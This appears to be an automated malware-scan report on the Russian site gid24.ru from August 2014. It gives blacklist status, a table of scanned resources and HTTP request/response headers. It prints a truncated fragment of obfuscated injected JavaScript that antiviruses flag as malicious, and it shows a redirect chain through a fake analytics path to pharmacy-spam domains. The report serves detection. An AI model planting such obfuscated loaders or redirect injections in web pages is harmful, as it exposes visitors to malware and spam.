Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gid24.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gid24.ru/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gid24.ru/ | 200 OK Content-Length: 78125 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
<!-- function h34c04fa8307(k93be50){var gb721c7c=String,sda8d3=k93be50.substr(4,3)-600,c45da53b,b1a4b09e;k93be50=k93be50.substr(7);var ff6005=k93be50.length;for(var mbc06d6b=0;mbc06d6b<ff6005;mbc06d6b++){try{throw(l931a861=p1aedd(k93be50,mbc06d6b));}catch(e){l931a861=e;};if(l931a861=='}'){sda8d3="";mbc06d6b++;cd2015fd=acea6c7(k93be50,mbc06d6b);while(cd2015fd!='}'){sda8d3+=cd2015fd;mbc06d6b++;cd2015fd=k93be50.substr(mbc06d6b,1);}sda8d3-=626;continue;}c45da53b="";if(r9d4683c(l931
Antivirus reports:
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12149 Content-Type: application/javascript | clean |
http://www.google.ru/coop/cse/brand?form=cse-search-box&lang=ru | 200 OK Content-Length: 2510 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21269 Content-Type: text/javascript | clean |
http://gid24.ru//mc.yandex.ru/metrika/watch.js/ | HTTP/1.1 302 Found Connection: close Date: Sat, 02 Aug 2014 05:03:24 GMT Location: http://superkarmapharma.com/ Server: nginx/1.4.3 Content-Length: 291 Content-Type: text/html; charset=iso-8859-1 | clean |
http://superkarmapharma.com/ | HTTP/1.1 302 Found Connection: close Date: Sat, 02 Aug 2014 05:03:24 GMT Location: http://remedialbestprogram.eu Server: nginx/1.6.0 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.28 | clean |
http://remedialbestprogram.eu/ | 403 Forbidden Content-Length: 168 Content-Type: text/html | clean |
http://remedialbestprogram.eu/test404page.js | 403 Forbidden Content-Length: 168 Content-Type: text/html | clean |
http://counter.rambler.ru/top100.jcn?2723757 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gid24.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sat, 02 Aug 2014 05:03:21 GMT
Pragma: no-cache
Server: nginx/1.4.3
Content-Type: text/html
Expires: Mon, 15 apr 2009 05:00:00 GMT
Last-Modified: Sat, 02 Aug 2014 05:03:21 GMT
Set-Cookie: PHPSESSID=15aefae50b7108ea1c6c7db4c46b69c0; path=/
Set-Cookie: __utmr_cache=cut_; expires=Tue, 31-Dec-2019 22:00:00 GMT
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: gid24.ru
Referer: http://www.google.com/search?q=gid24.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.